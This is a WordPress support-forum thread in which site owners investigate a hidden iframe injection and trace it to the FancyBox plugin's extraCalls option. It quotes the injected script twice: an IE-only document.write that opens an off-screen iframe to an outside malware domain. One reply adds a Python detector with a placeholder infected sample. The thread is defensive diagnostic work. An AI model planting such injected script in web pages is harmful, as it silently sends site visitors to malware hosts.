• Resolved SherabGyamtso

    (@sherabgyamtso)


    I have the last version of your plugin and WordPress.

    Everything was OK until today. I’ve got a report from SiteLock that my Contact page on my blog is infected with malware, with an iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Checked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="https://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>');}/*]]>*/</script>

    I deactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody help me to determine the source of this malware?

    Best

    Maciek

    https://www.ads-software.com/plugins/w3-total-cache/

Viewing 15 replies - 16 through 30 (of 110 total)
  • Johan thanks, I have sent this forum link to Host Gator security so they can keep an eye on the discussion here. At first I thought it was a new theme I added, but my other sites are not affected with this new theme, so I am thinking it might be this FancyBox plugin as I am not using this plugin on any of them.

    Can everyone run "select * from wp_options where option_name = 'mfbfw';" in mysql and post back the result. We believe it’s the exit point for the code.

    Ninjafirewall has just posted something about it:

    https://ninjafirewall.com/malware/index.php?threat=2015-02-04.01

    are you talking about this a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}

    Yes, the extraCalls parameter is being altered under certain circumstances (via db, or option filters) and then output here: https://plugins.trac.www.ads-software.com/browser/fancybox-for-wordpress/trunk/fancybox.php#L309

    Here is what I get:

    Error

    SQL query:

    SELECT option_name
    FROM wp_options
    WHERE mfbfw
    LIMIT 0 , 30

    MySQL said:
    #1054 – Unknown column 'mfbfw' in 'where clause'

    Wrong query RedKobra. select * from wp_options where option_name = 'mfbfw'; is the correct one. It’s probably empty for you as well.

    a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}

    In Fancybox for WP options there is a tab called “ExtraCalls”. “ExtraCalls” should be disabled by default but actually is enabled.

    Sub’d.

    A few clients affected…

    mfbfw seems to just be the uninstaller for the program

    MySQL returned an empty result set (i.e. zero rows). ( Query took 0.0004 sec )

    Fancybox might be a false lead, just a very common plugin; still investigating. Anyone seen it live? If so what browser and page please?

    I got "a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}" as well.

    <!-- Fancybox for WordPress v3.0.2 -->
    <script type="text/javascript">
    jQuery(function(){

    jQuery.fn.getTitle = function() { // Copy the title of every IMG tag and add it to its parent A so that fancybox can show titles
        var arr = jQuery("a.fancybox");
        jQuery.each(arr, function() {
            var title = jQuery(this).children("img").attr("title");
            jQuery(this).attr('title',title);
        })
    }

    // Supported file extensions
    var thumbnails = jQuery("a:has(img)").not(".nolightbox").filter( function() { return /\.(jpe?g|png|gif|bmp)$/i.test(jQuery(this).attr('href')) });

    jQuery("a.fancybox").fancybox({
        'cyclic': false,
        'autoScale': false,
        'padding': ,
        'opacity': false,
        'speedIn': ,
        'speedOut': ,
        'changeSpeed': ,
        'overlayShow': false,
        'overlayOpacity': "",
        'overlayColor': "",
        'titleShow': false,
        'titlePosition': '',
        'enableEscapeButton': false,
        'showCloseButton': false,
        'showNavArrows': false,
        'hideOnOverlayClick': false,
        'hideOnContentClick': false,
        'width': ,
        'height': ,
        'transitionIn': "",
        'transitionOut': "",
        'centerOnScroll': false
    });

    })
    </script>
    <script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="https://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
    <script>({

    })
    </script>
    <!-- END Fancybox for WordPress -->

    The script was output inside Fancybox judging by the START and END comments, so disable Fancybox as a quick solution.
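    As an added example (not code from this thread, the FancyBox plugin or WordPress), the check below parses a PHP-serialized mfbfw option_value such as the one quoted above, flags an extraCalls value that carries script or iframe markup while extraCallsEnable is on, and scans saved page source for an iframe wrapped in an off-screen div like the one in the pasted output. The marker list is a heuristic chosen here, and the infected sample row and its attacker.invalid domain are constructed placeholders.

```python
import re

def _parse(d: bytes):
    """Minimal PHP unserialize for the types this option row uses: s (string), i (int), a (array)."""
    t = d[:1]
    if t == b"s":                       # s:<len>:"<bytes>";  len is a byte count, so slice, never scan for '"'
        head, _, body = d.partition(b':"')
        n = int(head[2:])
        return body[:n].decode("utf-8", "replace"), body[n + 2:]
    if t == b"i":
        num, _, rest = d[2:].partition(b";")
        return int(num), rest
    if t == b"a":                       # a:<count>:{key value key value ...}
        head, _, body = d.partition(b":{")
        out = {}
        for _ in range(int(head[2:])):
            k, body = _parse(body)
            v, body = _parse(body)
            out[k] = v
        return out, body[1:]            # skip the closing '}'
    raise ValueError(f"unsupported PHP type {t!r}")

def php_unserialize(data: bytes): return _parse(data)[0]

# Markup that has no business inside a FancyBox "extraCalls" option value (heuristic, chosen here)
MARKERS = re.compile(r"<script|<iframe|document\.write|left:-\d{3,}px", re.I)

def audit_mfbfw(row: bytes) -> dict:
    """Parse the serialized mfbfw option_value and report whether extraCalls carries injected markup."""
    opts = php_unserialize(row)
    extra = str(opts.get("extraCalls") or "")
    enabled = str(opts.get("extraCallsEnable") or "").lower() == "on"
    hits = MARKERS.findall(extra)
    return {"enabled": enabled, "markers": hits, "suspicious": enabled and bool(hits)}

OFFSCREEN_IFRAME = re.compile(r'<div[^>]*left:-\d{3,}px[^>]*>\s*<iframe[^>]*\bsrc=["\']([^"\']+)', re.I)

def find_offscreen_iframes(html: str) -> list:
    """Return src URLs of iframes wrapped in a div pushed off-screen, as in the pasted page source."""
    return OFFSCREEN_IFRAME.findall(html)

# Constructed samples: the clean row quoted in the thread, and an infected row modelled on the injected script with a placeholder domain
CLEAN_ROW = b'a:2:{s:10:"extraCalls";s:1:" ";s:16:"extraCallsEnable";s:2:"on";}'
PAYLOAD = ('<script>if(navigator.userAgent.match(/msie/i)){document.write(\'<div style="position:absolute;'
           'left:-2000px;width:2000px"><iframe src="https://attacker.invalid/x.php" width="20" height="30">'
           '</iframe></div>\');}</script>')
INFECTED_ROW = (b'a:2:{s:10:"extraCalls";' + f's:{len(PAYLOAD)}:"{PAYLOAD}";'.encode()
                + b's:16:"extraCallsEnable";s:2:"on";}')
```

    Feed it the option_value column from the select above (or the saved HTML of the affected page) rather than trusting the admin screen, since the injected value can also arrive through option filters as the earlier reply notes.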

  • The topic ‘Possible malware’ is closed to new replies.